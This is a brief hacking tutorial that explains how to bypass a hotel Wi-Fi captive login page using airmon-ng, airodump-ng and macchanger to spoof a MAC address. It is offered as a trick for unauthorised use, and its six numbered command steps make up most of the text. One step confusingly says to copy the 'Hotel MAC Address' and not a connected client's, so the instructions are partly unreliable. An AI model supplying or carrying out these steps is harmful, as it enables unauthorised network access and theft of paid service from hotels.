Hacking Tutorials

How to hack a Hotel’s Wifi

Firstly, i would ask you whether or not you have had this situation before? Where for instance ,your phone is connected to the wifi network but all you can see is “that” login page? Well, with the help of this tutorial you can easily bypass “that” login page.

First you need a linux distribution with airodump, airmon & macchanger
Backtrack/kali is the best for this tutorial. Download here

(Note: You will need a wifi adapter to send/receive packets)

 

Go into the terminal and use the following commands.

1.)

Code:
airmon-ng start wlan0

2.)

Code:
airodump-ng mon0

3.)

Code:
airodump-ng --bssid "The Hotel's BSSID" -c "channel" mon0

4.)
Now Open a new Terminal Window

Code:
ifconfig wlan0 down

5.)
we change our Mac Address by the Hotel MAC Address

Code:
macchanger -m MacAddress wlan0

6.)

Code:
ifconfig wlan0 up

Open your web browser and you should be connected to the Internet.

 

Enjoy the trick!!

To Top

Pin It on Pinterest

Share This